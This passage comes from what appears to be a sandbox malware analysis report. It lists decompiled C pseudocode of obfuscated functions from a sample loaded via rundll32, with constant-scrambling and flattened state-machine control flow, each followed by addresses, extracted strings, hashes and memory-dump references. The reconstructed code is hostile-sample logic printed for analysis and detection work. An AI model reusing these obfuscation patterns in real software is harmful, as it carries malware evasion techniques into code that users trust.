				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x21ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x21ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E0020F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E002088E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x21c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00208736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E0020568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}

0x00206754
0x0020675a
0x0020675f
0x00206767
0x0020676f
0x00206777
0x0020677c
0x00206784
0x0020678c
0x00206794
0x0020679c
0x002067a4
0x002067a9
0x002067b1
0x002067b8
0x002067bc
0x002067cb
0x002067cf
0x002067d1
0x002067db
0x002067e3
0x002067e5
0x002067ed
0x002067f2
0x002067fa
0x00206809
0x0020680c
0x00206810
0x0020681d
0x00206821
0x00206829
0x00206839
0x0020683d
0x00206842
0x0020684a
0x00206852
0x00206857
0x0020685f
0x00206867
0x0020686b
0x00206877
0x0020687a
0x0020687e
0x00206882
0x0020688a
0x00206892
0x00206897
0x0020689c
0x002068a4
0x002068a4
0x002068b2
0x00206984
0x00206987
0x0020698c
0x0020698f
0x00000000
0x0020698f
0x002068be
0x002068c6
0x00000000
0x00206981
0x002068d2
0x00000000
0x002068d8
0x002068de
0x002068e6
0x002068f0
0x002068f8
0x002068f9
0x00000000
0x002068f9
0x0020699f
0x0020699f
0x0020699f
0x0020690d
0x00206911
0x00206912
0x00206917
0x0020691a
0x0020691d
0x0020691f
0x00000000
0x0020691f
0x00000000
0x0020691d
0x00206929
0x0020692a
0x00206934
0x00206935
0x00206939
0x0020693b
0x0020693f
0x00206943
0x00206945
0x0020694a
0x0020694f
0x0020695b
0x00000000
0x00206951
0x00206951
0x00000000
0x00206951
0x00000000
0x00206960
0x00206960
0x00000000

Strings

zA, xrefs: 00206882
r<-$, xrefs: 0020691F
u, xrefs: 0020688A
r<-$, xrefs: 002068CC
:z, xrefs: 0020677C

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :z$r<-$$r<-$$u$zA
API String ID: 0-4189644680
Opcode ID: a55af7291dbe388b4d1800855f7d1ddc2dd561ac9fec852d0673b02800d69d5e
Instruction ID: 91d1ff72ca2f966ee70e22689cdbb4d997507dd85bfcc486add5ac8373b9b8b8
Opcode Fuzzy Hash: a55af7291dbe388b4d1800855f7d1ddc2dd561ac9fec852d0673b02800d69d5e
Instruction Fuzzy Hash: 805199715183029FD318CF26C94951FBBE0EBC8758F108A1DF4D8A62A1D7B48A29CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0020839D, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0020839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00218C8F(_t189);
				_t217 = _v28 + E00218C8F(_t189) % _v52;
				_t184 = _v20 + E00218C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E0020D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}

0x002083a0
0x002083aa
0x002083b2
0x002083b7
0x002083bf
0x002083d1
0x002083d5
0x002083dc
0x002083df
0x002083e3
0x002083e8
0x002083f0
0x002083fd
0x00208401
0x00208406
0x0020840e
0x00208416
0x0020841e
0x00208426
0x0020842e
0x00208436
0x0020843e
0x00208446
0x0020844e
0x00208456
0x0020845e
0x00208466
0x0020846e
0x00208476
0x0020847e
0x00208483
0x00208490
0x00208494
0x0020849c
0x002084a8
0x002084ad
0x002084b3
0x002084bb
0x002084c3
0x002084cb
0x002084d0
0x002084d8
0x002084e0
0x002084e8
0x002084f0
0x002084f8
0x00208500
0x00208508
0x00208510
0x00208515
0x0020851d
0x00208525
0x00208531
0x00208536
0x0020853c
0x00208544
0x00208551
0x00208552
0x0020855c
0x00208560
0x00208568
0x00208570
0x00208578
0x00208580
0x00208584
0x0020858c
0x002085a1
0x002085c2
0x002085d9
0x002085dd
0x002085e2
0x002085e4
0x002085e6
0x002085ee
0x002085f0
0x002085f2
0x002085f5
0x0020860f
0x00208619
0x00208623

Strings

o9, xrefs: 00208584
BQ{*, xrefs: 0020841E
H', xrefs: 002083E8
Qv, xrefs: 0020853C
KB, xrefs: 00208500

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: BQ{*$H'$KB$Qv$o9
API String ID: 0-3657823386
Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction ID: d40f09901f846156d2028def0760800c013daa920e6aa003d057a977581eb36d
Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
Instruction Fuzzy Hash: 146111701093419FD348CF25D58A50BBBE1FBC8748F408A1DF1DA962A0D7B9DA198F86

Uniqueness

Uniqueness Score: -1.00%

Function 100012B1, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 100012E0
CreateWindowExA.USER32 ref: 1000131E
ShowWindow.USER32(00000000,?), ref: 1000132E
UpdateWindow.USER32 ref: 10001335

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Window$CreateShowUpdateVersion
String ID:
API String ID: 738887465-0
Opcode ID: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction ID: 341d4f5b6357358a1a841b5e4f677a2f36a9486d77b2b7535788157dddeffb30
Opcode Fuzzy Hash: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction Fuzzy Hash: 3F01B571610138BFE7149B24CE89FAB7BACEB46200F41415AF905D3210CB70AE45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00205B79, Relevance: 5.2, Strings: 4, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00205B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E0021023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00208736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00212674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E0020F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00208736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E0020F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}

0x00205b79
0x00205b79
0x00205b80
0x00205b84
0x00205b88
0x00205b92
0x00205b99
0x00205ba1
0x00205ba9
0x00205bae
0x00205bb6
0x00205bbe
0x00205bc6
0x00205bce
0x00205bd6
0x00205bde
0x00205be7
0x00205beb
0x00205bf0
0x00205bfd
0x00205c02
0x00205c08
0x00205c10
0x00205c18
0x00205c1d
0x00205c25
0x00205c2d
0x00205c35
0x00205c3a
0x00205c47
0x00205c48
0x00205c4c
0x00205c54
0x00205c5c
0x00205c61
0x00205c69
0x00205c6e
0x00205c76
0x00205c7e
0x00205c86
0x00205c8e
0x00205c96
0x00205c9e
0x00205ca6
0x00205cae
0x00205cb6
0x00205cbe
0x00205cc6
0x00205cce
0x00205cd6
0x00205cde
0x00205ce6
0x00205cee
0x00205cf6
0x00205cfb
0x00205d03
0x00205d11
0x00205d15
0x00205d1d
0x00205d25
0x00205d32
0x00205d36
0x00205d3b
0x00205d43
0x00205d4d
0x00205d5b
0x00205d60
0x00205d66
0x00205d6e
0x00205d76
0x00205d7e
0x00205d82
0x00205d8a
0x00205d92
0x00205d9a
0x00205da2
0x00205daf
0x00205db0
0x00205db4
0x00205db8
0x00205dbc
0x00205dc4
0x00205dcc
0x00205dda
0x00205dde
0x00205de7
0x00205deb
0x00205df3
0x00205df7
0x00205e09
0x00205e66
0x00205e68
0x00205e6b
0x00205e71
0x00205f29
0x00000000
0x00205e77
0x00205e77
0x00205e7d
0x00000000
0x00205e83
0x00205e87
0x00205e89
0x00205e8d
0x00205e8f
0x00000000
0x00205e91
0x00205e95
0x00205ea0
0x00205ea1
0x00205ea2
0x00205eab
0x00205eb1
0x00000000
0x00205eb3
0x00205ec6
0x00205ed8
0x00205edd
0x00205edf
0x00205ee2
0x00205ee9
0x00205eec
0x00205ef0
0x00205ef4
0x00000000
0x00205ef6
0x00000000
0x00205ef6
0x00205ef4
0x00205eb1
0x00205e8f
0x00205e7d
0x00205e0b
0x00205e11
0x00205f00
0x00205f06
0x00000000
0x00000000
0x00000000
0x00000000
0x00205e17
0x00205e1b
0x00205e28
0x00205e29
0x00205e2c
0x00205e31
0x00205e37
0x00205f0c
0x00205f0c
0x00205f12
0x00205f2d
0x00205f3a
0x00205f14
0x00205f14
0x00205f1a
0x00205f1c
0x00205f1c
0x00205e3d
0x00205e3d
0x00205e41
0x00205e43
0x00205e43
0x00205e47
0x00000000
0x00205e47
0x00205e37
0x00205e11
0x00205f28
0x00205f28
0x00205efb
0x00000000

Strings

b-, xrefs: 00205D66
z#, xrefs: 00205CFB
l', xrefs: 00205BBE
bA, xrefs: 00205C76

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: b-$bA$l'$z#
API String ID: 0-3285866504
Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction ID: 207005939b51ac64553fe63bcb6391738afa8713cffce720c8c2f013781e841e
Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction Fuzzy Hash: 8BA142B15187829FD364CF29C48980FBBE1FBC4718F508A1DF595862A0D3B8DA098F83

Uniqueness

Uniqueness Score: -1.00%

Function 002080BA, Relevance: 5.1, Strings: 4, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E002080BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E0020602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E0021360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00208736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E002150F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E002161B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00207998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}

0x002080c0
0x002080c8
0x002080c9
0x002080d0
0x002080d3
0x002080d4
0x002080d9
0x002080e1
0x002080e4
0x002080eb
0x002080f3
0x002080f8
0x0020810c
0x0020810d
0x00208111
0x00208116
0x0020811e
0x00208126
0x0020812a
0x00208132
0x0020813a
0x00208142
0x0020814a
0x00208152
0x00208160
0x00208164
0x0020816c
0x00208179
0x0020817d
0x00208185
0x0020818d
0x00208192
0x00208197
0x0020819f
0x002081a7
0x002081ac
0x002081b4
0x002081bc
0x002081c4
0x002081cc
0x002081d4
0x002081dc
0x002081e4
0x002081ec
0x002081f4
0x002081f9
0x00208201
0x0020820e
0x00208212
0x0020821c
0x0020821c
0x0020822e
0x002082c8
0x002082cd
0x002082d0
0x00000000
0x00208234
0x0020823a
0x0020829d
0x0020829e
0x002082a2
0x002082a7
0x002082ab
0x002082ad
0x002082af
0x00000000
0x002082af
0x0020823c
0x0020823e
0x00208282
0x00208287
0x0020828a
0x00000000
0x00208240
0x00208246
0x00208267
0x0020826a
0x00000000
0x00208248
0x0020824e
0x00000000
0x00208254
0x00208254
0x00208256
0x0020825b
0x00000000
0x0020825b
0x0020824e
0x00208246
0x0020823e
0x0020823a
0x00000000
0x0020822e
0x002082ef
0x002082f4
0x002082f7
0x002082fc
0x002082fc
0x002082fc
0x00208309
0x0020830b
0x0020830f
0x0020830f
0x00208316

Strings

+%, xrefs: 00208256
+%, xrefs: 00208240
XE, xrefs: 0020819F
n(, xrefs: 00208201

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +%$+%$XE$n(
API String ID: 0-3838449085
Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction ID: 2b684d1e608c1e7b0f0cc6bcd4f4c786c02f87374d7b563bb29f97fe5837cd49
Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction Fuzzy Hash: 3D5154701097429FC758DF20C88982BBBE1BB94348F505A2DF5C6962A1DBB18A598F83

Uniqueness

Uniqueness Score: -1.00%

Function 00218D1C, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00218D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
